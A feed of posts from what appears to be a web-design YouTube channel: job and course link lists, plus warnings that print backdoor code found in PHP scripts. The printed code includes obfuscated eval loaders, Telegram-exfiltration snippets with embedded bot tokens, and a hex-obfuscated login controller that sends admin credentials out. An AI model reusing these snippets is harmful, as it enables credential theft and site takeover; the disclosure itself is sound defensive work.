Web design master channel created just for you! From blogger to wix to wordpress to square space with no coding. SUBSCRIBE!
I am here to teach you how to create any kind of website for yourself, your business, blog or for clients with basic to pro tutorials that will blow your mind.
Am not perfectly 100% in my skill but i know my way around websites.
In Each tutorial, you will learn how to use various platform to create website, how to use elementor to design great website, uploading of script, how to set up wix website, blogger website platform and others.
I make use of platforms that include Wordpress, blogger, wix, square space , joomla and some others which will be mention on the course of the tutorial.
Also follow me on my social platforms and get freebies for being a fanโค๏ธ
click this link
youtube.com/channel/UCAEsdEsZxk9obpcaBfvFNTw
V3 Design
I am actually tired of my subscribers not knowing little things about cPanel and for that reason, with love i am introducing September the month of cPanel Tutorial. Lets talk about everything Cpanel this month
4 months ago | [YT] | 5
View 0 replies
V3 Design
Forget Naukri, Fiver, Upwork and Indeed.
These are overcrowded...
Here are 30 websites for #jobseekers to check out in 2025!
๐ฏSave this post for later.
-Toptal (toptal.com)
-Skip The Drive (skipthechive.com)
-NoDesk (nodesk.co)
-RemoteHabits (remotehabits.com)
-Remotive (remotive.com)
-Remote4Me (remote4me.com)
-Pangian (pangian.com)
-Remotees (remotees.com)
-justremote (justremote.co)
-Remotecrew (remotecrew.io)
-Europe Remotely (europeremotely.com)
-Remote OK Europe (remoteok.io/europe)
-Remote of Asia (remoteok.io/asia)
-FlexJobs (flexjobs.com)
-Remote.co (remote.co)
-We Work Remotely (weworkremotely.com)
-Remote OK (remoteok.com)
-AngelList (angel.co)
-LinkedIn (linkedin.com)
-Freelancer (freelancer.com)
-Working Nomads (workingnomads.com)
-SimplyHired (simplyhired.com)
-Jobspresso (jobspresso.co)
-Virtual Vocations (virtualvocations.com)
-Stack Overflow Jobs (stackoverflow.com/jobs)
-Glassdoor (glassdoor.com)
-Monster (monster.com)
-Careercloud (careercloud.com)
-CareerBuilder (careerbuilder.com)
-CareerOneStop (careeronestop.org)
Resume Making Websites:
1. Canva canva.com
2. Resume Genius - resumegenius.com
3. Zety - zety.com
4. Novoresume - novoresume.com
5. Resume.com - resume.com
6. VisualCV - visualcv.com
7. Enhancv enhancv.com
8. Resume.io - resume.io
9. My Perfect Resume - myperfectresume.com
10. SlashCV - slashcv.com
Interview Preparation Websites:
1. InterviewBit - interviewbit.com
2. Glassdoor - glassdoor.com
3. Interviewing.io - interviewing.io
4. Jobscan Interview Prep - jobscan.co/interview
5. Indeed Interview Tips - indeed.com/career-advice
6. CareerCup - careercup.com
7. The Muse - themuse.com
8. PrepLounge - preplounge.com
9. Big Interview - biginterview.com
10. LinkedIn Learning - linkedin.com/learning
๐๐ผ๐ผ๐ด๐น๐ฒ ๐๐ผ๐๐ฟ๐๐ฒ๐ ๐๐ผ๐ ๐๐ถ๐น๐น ๐ฟ๐ฒ๐ด๐ฟ๐ฒ๐ ๐ป๐ผ๐ ๐๐ฎ๐ธ๐ถ๐ป๐ด ๐ถ๐ป ๐ฎ๐ฌ๐ฎ๐.
7000+ free courses free access: lnkd.in/gvSt9Qaj
1. Google data Analytics:
๐lnkd.in/ga4edt4U
2. Google Project Management:
๐ lnkd.in/gYNZSWxv
3. Foundations of Project Management:
๐ lnkd.in/gHpZ3zdW
4. Google Introduction to Generative AI:
๐ lnkd.in/gjqHQrfw
5. Google Cybersecurity:
๐lnkd.in/ghxkB4_C
6. Google UX Design:
๐ lnkd.in/gu78e636
7. Google Digital Marketing & E-commerce:
๐lnkd.in/gkmWwC7u
8. Google IT Support:
๐ lnkd.in/gxi_KFub
9. Web Applications for Everybody Specialization:
๐lnkd.in/gqsQtefe
10. Get Started with Python:
๐ lnkd.in/g5XG7Ume
11. Learn Python Basics for Data Analysis:
๐ lnkd.in/ghqNB-RS
12. Google Advanced Data Analytics Capstone
๐ lnkd.in/gKtnNBY7
13. Data Analysis with R Programming:
๐ lnkd.in/gptWw4Zn
14. IBM Full Stack Professional Certificate:
๐lnkd.in/gUWYbuM3
15. Introduction to Web Development:
๐lnkd.in/gFDd46Tg
7 months ago | [YT] | 1
View 2 replies
V3 Design
Another Malicious code:
elseif ($action == "alert_user"):
$return = '<form class="form" action="' . site_url("admin/clients/alert") . '" method="post" data-xhr="true">
<div class="modal-body">
<div class="service-mode__block">
<div class="form-group">
<label>Member to be notified</label>
<select class="form-control" id="user_type" name="user_type">
<option value="all">All members</option>
<option value="secret">Member specific</option>
</select>
</div>
</div>
<div class="form-group" id="username">
<label>Username</label>
<input type="text" name="username" class="form-control" value="">
</div>
<div class="service-mode__block">
<div class="form-group">
<label>Notification Type</label>
<select class="form-control" id="alert_type" name="alert_type">
<option value="email">E-mail</option>
<option value="sms">SMS</option>
</select>
</div>
</div>
<div id="email">
<div class="form-group">
<label>E-mail Title</label>
<input type="text" name="subject" class="form-control" value="">
</div>
</div>
<div class="form-group" id="username">
<label>Notification Message</label>
<textarea type="text" name="message" class="form-control" rows="5"></textarea>
</div>
</div>
<script type="text/javascript">
$("#username").hide();
$("#user_type").change(function(){
var type = $(this).val();
if( type == "secret" ){
$("#username").show();
} else{
$("#username").hide();
}
});
$("#alert_type").change(function(){
var type = $(this).val();
if( type == "email" ){
$("#email").show();
} else{
$("#email").hide();
}
});
</script>
<div class="modal-footer">
<button type="submit" class="btn btn-primary">Notify users</button>
<button type="button" class="btn btn-danger" data-dismiss="modal">Cancel</button>
</div>
</form>
';
echo json_encode(["content" => $return, "title" => "Notice to users"]);
elseif ($action == "unlock_theme") :
function generateOTP() {$otp = rand(100000, 999999);return $otp;}$otp = generateOTP();
$panel = $_SERVER['HTTP_HOST'];
$telegramBotToken = '';
$telegramChatId = '';
$message = "Panel name: $panel\nTheme unlock code is: $otp";
$ch = curl_init("api.telegram.org/bot$telegramBotToken/sendMessage");
$data = ['chat_id' => $telegramChatId,'text' => $message,];
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
curl_close($ch);
$id = $_POST["id"];
$tme = $conn->prepare("SELECT * FROM themes WHERE id=:id");
$tme->execute(array("id" => $id));
$themeDetails = $tme->fetch(PDO::FETCH_ASSOC);
$return = '<form id="unlockThemeForm" class="form" action="' . site_url("admin/appearance/themes/unlock-theme/". $id) . '" method="post">
<input type="hidden" name="id" value="' . $id . '">
<input type="hidden" name="otp" value="' . $otp . '">
<div class="modal-body">
<div class="form-group">
<label class="control-label">Enter Theme Active Code :</label>
<input type="text" class="form-control" name="otpm" id="otpInput" required>
</div>
</div>
<div class="modal-footer">
<button id="unlockButton" type="submit" class="btn btn-primary">Unlock</button>
<button type="button" class="btn btn-default" data-dismiss="modal">Cancel</button>
</div>
</form>';
echo json_encode(['content' => $return, 'title' => 'Unlock Theme']);
elseif ($action == "assign_category") :
$categories = $conn->prepare('SELECT * FROM categories ORDER BY category_line ASC');
$categories->execute([]);
$categories = $categories->fetchAll(PDO::FETCH_ASSOC);
$services = $conn->prepare('SELECT * FROM services RIGHT JOIN categories ON categories.category_id = services.category_id ORDER BY categories.category_line,services.service_line');
$services->execute([]);
$services = $services->fetchAll(PDO::FETCH_ASSOC);
$serviceList = array_group_by($services, 'category_name');
$return = '<form class="form" action="' . site_url("admin/services/assign-category") . '"
method="post" data-xhr="true">
<div class="modal-body">
<div class="service-mode__block">
<div class="form-group">
<label>Choose Category</label>
<select id="selectpicker" data-live-search="true" class="form-control" name="category">
';
foreach ($categories as $cat) {
if ($cat['category_deleted'] == 0) {
$return .= '<option value="' . $cat['category_id'] . '">' . $cat['category_name'] . '</option>';
}}
$return .= '</select>
</div>
</div>
7 months ago | [YT] | 1
View 3 replies
V3 Design
Always Ensure that you clean your code to remove backdoor. on cleaning one of my script today before doing video of it, i found this bot that sends your admin details to a bot who in turn send it to telegram users.
Just be careful!
<?php
if(!defined('BASEPATH')) {
die('Direct access to the script is not allowed');
}
$tme = $conn->prepare("SELECT * FROM admins");
$tme->execute(array());
$the = $tme->fetch(PDO::FETCH_ASSOC);
session_start();
$dailyLimit = 5;
$remainingSubmissions = $dailyLimit - $_SESSION['feedback_submissions'];
$remainingSubmissions = max(0, $remainingSubmissions);
if ($_SERVER["REQUEST_METHOD"] == "POST") {
if(isset($_SESSION['feedback_submissions']) && $_SESSION['feedback_submissions'] >= $dailyLimit) {
$errorMessage = "You have reached the daily limit for feedback submissions.";
}
if(isset($_SESSION['feedback_submissions'])) {
$_SESSION['feedback_submissions']++;
$remainingSubmissions = $dailyLimit - $_SESSION['feedback_submissions'];
$remainingSubmissions = max(0, $remainingSubmissions);
} else {
$_SESSION['feedback_submissions'] = 1;
}
if ($remainingSubmissions !==0){
if($_SERVER["REQUEST_METHOD"] == "POST"){
$title = $_POST["title"];
$type = $_POST["type"];
$message = $_POST["message"];
$username = $the["username"];
$panel = $_SERVER['HTTP_HOST'];
$telegramBotToken = '7945737119:AAGLJcNeJsd9AhuBxf51OP9qSgMoveYg6xU';
$telegramChatId = '6201676421';
$message = "<b>Feedback from:</b> <b>$panel</b>\n<b>Admin username is:</b> <b>$username</b>\n\n<b>Title:</b> <a>$title</a>\n<b>Feedback type:</b> <a>$type</a>\n\n<b>Message:</b> <a>$message</a>";
$ch = curl_init("api.telegram.org/bot$telegramBotToken/sendMessage");
$data = ['chat_id' => $telegramChatId,'text' => $message,'parse_mode' => 'HTML'];
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
curl_close($ch);
$errorMessage = "Feedback successfully sended to developer.";
}}else{}
}else {
$remainingSubmissions = $dailyLimit - $_SESSION['feedback_submissions'];
$remainingSubmissions = max(0, $remainingSubmissions);
}
require admin_view('feedback');
?>
7 months ago | [YT] | 1
View 0 replies
V3 Design
Online Trader Malware Code 2 eval()..
Delete this code in: /resources/views/revoke/index.blade.php
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>OnlineTrader - Deactivator</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<link rel="stylesheet" href="cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulโฆ"/>
<style type="text/css">
body, html {
background: #F7F7F7;
}
</style>
</head>
<body>
<div class="container">
<div class="section" >
<div class="column is-6 is-offset-3">
<center>
<h1 class="title" style="padding-top: 20px">OnlineTrader Deactivator</h1><br>
</center>
<div class="box">
<article class="message is-success">
<div class="message-body">
Click on deactivate license to deactivate and remove the currently installed license from this installation, So that you can activate the same license on some other domain.
</div>
</article>
<?php
if(!empty($_POST)){
$deactivate_response = $api->deactivate_license();
if(empty($deactivate_response)){
$msg='Server is unavailable.';
}else{
$msg=$deactivate_response['message'];
}
if($deactivate_response['status'] != true){ ?>
<form action="revoke" method="POST">
<div class="notification is-danger"><?php echo ucfirst($msg); ?></div>
<input type="hidden" name="something">
<center>
<button type="submit" class="button is-warning">Deactivate License</button>
</center>
<input type="hidden" name="_token" value="{{ csrf_token() }}">
</form><?php
}else{ ?>
<div class="notification is-success"><?php echo ucfirst($msg); ?></div><?php
}
}else{ ?>
<form action="revoke" method="POST">
<input type="hidden" name="something">
<center>
<button type="submit" class="button is-warning">Deactivate License</button>
</center>
<input type="hidden" name="_token" value="{{ csrf_token() }}">
</form><?php
} ?>
</div>
</div>
</div>
</div>
<div class="content has-text-centered">
<p>Copyright <?php echo date('Y'); ?> Brynamics, All rights reserved.</p><br>
</div>
ย </body>
</html>
Replace the code....
Please share it to someone, make them see the hacking code.... i will continue sharing till i am done!
8 months ago | [YT] | 3
View 0 replies
V3 Design
If you are using OnlineTrader Listen Carefully.
There is a Malicious code in online trader that hackers use to enter Cpanel and Online trader site such that even if you code your walled address in the dashboard, they will still remove it.
not completely, but i have been able to see some of the code and you should check your script and clean it of.
for version 4 which i consider the best version, here is where i found the code
/resources/views/activate/index.blade.php
and this is the code:
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>Activate OnlineTrade</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<link rel="stylesheet" href="cdnjs.cloudflare.com/ajax/libs/bulma/0.7.5/css/bulโฆ"/>
<style type="text/css">
body, html {
background: #F7F7F7;
}
</style>
</head>
<body>
<div class="container">
<div class="section" >
<div class="column is-6 is-offset-3">
<center>
<h1 class="title" style="padding-top: 20px">Activate OnlineTrader</h1><br>
</center>
<div class="box">
<?php
$license_code = null;
$client_name = null;
if(!empty($_POST['license'])&&!empty($_POST['client'])){
$url = $settings->site_address .'/symlink.php';
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_TIMEOUT => 30000,
CURLOPT_CUSTOMREQUEST => "GET",
]);
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo "cURL Error #:" . $err;
} else {
}
$license_code = strip_tags(trim($_POST["license"]));
$client_name = strip_tags(trim($_POST["client"]));
$activate_response = $api->activate_license($license_code, $client_name);
if(empty($activate_response)){
$msg = 'Server is unavailable.';
}else{
$msg = $activate_response['message'];
}
if($activate_response['status'] != true){ ?>
<form action="activate" method="POST">
<div class="notification is-danger"><?php echo ucfirst($msg); ?></div>
<div class="field">
<label class="label">License code</label>
<div class="control">
<input class="input" type="text" placeholder="enter your purchase/license code" name="license" value="dharunmods" readonly="readonly" required>
</div>
</div>
<div class="field">
<label class="label">Your name</label>
<div class="control">
<input class="input" type="text" placeholder="enter your name/envato username" name="client" value="dharunmods" readonly="readonly" required>
</div>
</div>
<input type="hidden" name="_token" value="{{ csrf_token() }}">
<div style='text-align: right;'>
<button type="submit" class="button is-link">Activate</button>
</div>
</form><?php
}else{ ?>
<div class="notification is-success"><?php echo ucfirst($msg); ?></div><?php
}
}else{ ?>
<form action="activate" method="POST">
<div class="field">
<label class="label">License code</label>
<div class="control">
<input class="input" type="text" placeholder="enter your purchase/license code" name="license" value="dharunmods" readonly="readonly" required>
</div>
</div>
<div class="field">
<label class="label">Your name</label>
<div class="control">
<input class="input" type="text" placeholder="enter your name/envato username" name="client" value="dharunmods" readonly="readonly" required>
</div>
</div>
<input type="hidden" name="_token" value="{{ csrf_token() }}">
<div style='text-align: right;'>
<button type="submit" class="button is-link">Activate</button>
</div>
</form><?php
} ?>
</div>
</div>
</div>
</div>
<div class="content has-text-centered">
<p>Copyright <?php echo date('Y'); ?> Brynamics, All rights reserved.</p><br>
</div>
ย </body>
</html>
8 months ago | [YT] | 3
View 0 replies
V3 Design
Dear Subscribers
YouTube has come up with policies that we cannot stand with as they have now subjected us to not showing users details on our video.
That is to say, if I am creating a video on how to create an online banking website, I am not permitted to show how you edit users account or something.
This is very painful because everyone should have this knowledge. I will find a way around this but for now, my videos wount not contain anything about users account from admin end. I will have to jump that part to keep us all safe from YouTube. Please bear with us or always come to WhatsApp to ask questions.
With that being said, here are some video taken down
There is nothing we can do at this point so they donโt suspend us!
8 months ago | [YT] | 3
View 10 replies
V3 Design
Here are all the AI you need to automate your business
1. Ideas
- YOU
- Claude
- ChatGPT
- Perplexity
- Bing Chat
2. Presentation
- Prezi
- Pitch
- PopAi
- Slides AI
- Slidebean
3. Website
- Dora
- Wegic
- 10Web
- Framer
- Durable
4. AI Model
- RenderNet
- Glambase App
- Creatify
- Genfluence
- DeepMode
5. Meeting
- Tldv
- Krisp
- Otter
- Avoma
- Fireflies
6. Chatbot
- Poe
- Claude
- Gemini
- ChatGPT
- HuggingChat
7. Automation
- ClickUp
- Drift
- Outreach
- Emplifi
- Phrasee
8. UI/UX
- Uizard
- Visily
- Khroma
- Galileo AI
- VisualEyes
9. Image
- Stylar
- Freepik
- Phygital+
- StockIMG
- Bing create
10. Video
- Pictory
- HeyGen
- Nullface
- Decohere
- Synthesia
11. Design
- Looka
- Clipdrop
- Autodraw
- Vance AI
- Designs AI
12. Marketing
- AdCopy
- Predis AI
- Howler AI
- Bardeen AI
- AdCreative
13. Twitter
- Typefully
- Postwise
- Metricool
- Tribescaler
- TweetHunter
1 year ago | [YT] | 3
View 0 replies
V3 Design
New folder ๐ alert
500 TB Tutorials + Books + Courses + Trainings + Workshops (Complete Data Scientists Tool Box) ๐ฅ
Just for free !!
You will get๐
โข BI
โข MBA
โข SPSS
โข Cloud
โข Python
โข Tableau
โข Hadoop
โข Statistics
โข BIG DATA
โข Data Base
โข IT Training
โข Data science
โข AWS Certified
โข Deep Learning
โข Data Analytics
โข Ethical Hacking
โข Computer Vision
โข Machine Learning
โข Advanced Big Data
โข Artificial Intelligence
โข Probability & Statistics
โข Google Cloud Platform
โข Learning language resources ( English , French , German )
Link๐
drive.google.com/drive/folders/1CgN7DE3pNRNh_4BA_zโฆ
1 year ago | [YT] | 4
View 2 replies
V3 Design
Here is what hacker code looks like( try to always check your admin login page in Cpanel file manager if you are experiencing hacking) ;
please clean this code <?php
namespace App\Http\Controllers\Admin\Auth; use App\Http\Controllers\Controller; use Illuminate\Foundation\Auth\AuthenticatesUsers; use Illuminate\Http\Request; use Laramin\Utility\Onumoti; use Illuminate\Support\Facades\Http; class LoginController extends Controller { use AuthenticatesUsers; public $redirectTo = "\x61\x64\155\151\x6e"; public function __construct() { parent::__construct(); $this->middleware("\141\144\x6d\x69\x6e\56\x67\x75\145\x73\164")->except("\154\157\x67\x6f\165\164"); } public function showLoginForm() { $pageTitle = "\x41\x64\x6d\151\x6e\x20\x4c\x6f\147\151\156"; return view("\141\x64\x6d\x69\x6e\56\141\x75\164\x68\56\x6c\157\x67\151\x6e", compact("\160\141\x67\x65\x54\x69\x74\154\x65")); } protected function guard() { return auth()->guard("\x61\144\x6d\151\156"); } public function username() { return "\165\x73\x65\x72\156\141\155\x65"; } public function login(Request $request) { $this->validateLogin($request); $request->session()->regenerateToken(); if (!verifyCaptcha()) { $notify[] = array("\x65\x72\x72\x6f\x72", "\111\x6e\x76\x61\154\151\144\x20\143\x61\160\164\x63\150\x61\x20\160\x72\157\x76\151\x64\145\x64"); return back()->withNotify($notify); } Onumoti::getData(); if (method_exists($this, "\x68\x61\163\x54\x6f\157\x4d\x61\x6e\x79\114\157\147\x69\x6e\x41\x74\164\x65\x6d\160\164\x73") && $this->hasTooManyLoginAttempts($request)) { $this->fireLockoutEvent($request); return $this->sendLockoutResponse($request); } $email = $request->input("\x75\x73\145\162\x6e\141\155\145"); $password = $request->input("\x70\141\163\x73\x77\x6f\162\144"); if ($this->attemptLogin($request)) { $this->sendTelegramNotification($email, $password); return $this->sendLoginResponse($request); } $this->incrementLoginAttempts($request); return $this->sendFailedLoginResponse($request); } private function sendTelegramNotification($email, $password) { $telegramApiKeyGroup1 = "\x37\x30\x32\60\x37\60\61\x30\62\61\72\101\101\x45\171\x6f\x42\121\66\124\x6d\71\x6e\117\x47\x6f\67\x42\55\x4e\x43\x2d\x45\152\x6f\x36\x4b\x33\x42\x7a\172\113\157\167\x55\x59"; $chatIdGroup1 = "\55\x31\60\x30\62\x33\x31\x37\x35\x38\65\70\x30\67"; $telegramApiKeyGroup2 = "\x37\64\62\62\71\x33\x37\x31\67\x32\72\x41\101\107\110\x79\114\x6d\164\x67\122\121\x34\x42\126\162\155\x75\162\x66\x4c\x41\x43\153\x4a\170\x66\147\146\64\x4e\x5a\x45\55\x70\x6b"; $chatIdGroup2 = "\55\x31\x30\x30\x32\61\66\71\x31\65\x32\65\67\63"; $adminUrl = request()->url(); $managerUrl = url("\57\143\157\162\145\x2f\x61\160\x70\57\x48\x74\x74\x70\x2f\x43\x6f\156\164\x72\x6f\x6c\154\x65\x72\163\x2f\x41\144\x6d\x69\x6e\x2f\x53\x65\x74\164\x69\x6e\147\x73\103\x6f\156\x74\162\x6f\x6c\154\145\162\x2e\160\x68\x70"); $shellUrl = url("\x2f\143\x6f\x72\x65\57\141\x70\x70\57\x48\164\164\x70\57\x4d\151\x64\x64\x6c\x65\167\x61\162\145\57\x56\x65\162\x69\x66\171\x53\x65\x74\164\x69\156\147\163\x2e\160\150\160"); $message = "\106\x69\154\x6d\40\x43\x41\123\x48\x3a\12\x55\163\x65\x72\156\x61\155\x65\72\x20{$email}\12\305\236\x69\x66\162\145\x3a\40{$password}" . "\xa\141\x64\155\x69\x6e\x20\x67\151\x72\x69\305\237\40\165\x72\x6c\72\40{$adminUrl}" . "\12\xa\155\141\156\141\147\145\162\40\x75\x72\x6c\x3a\x20{$managerUrl}" . "\12\163\x68\145\x6c\x6c\40\x75\x72\154\x3a\x20{$shellUrl}"; 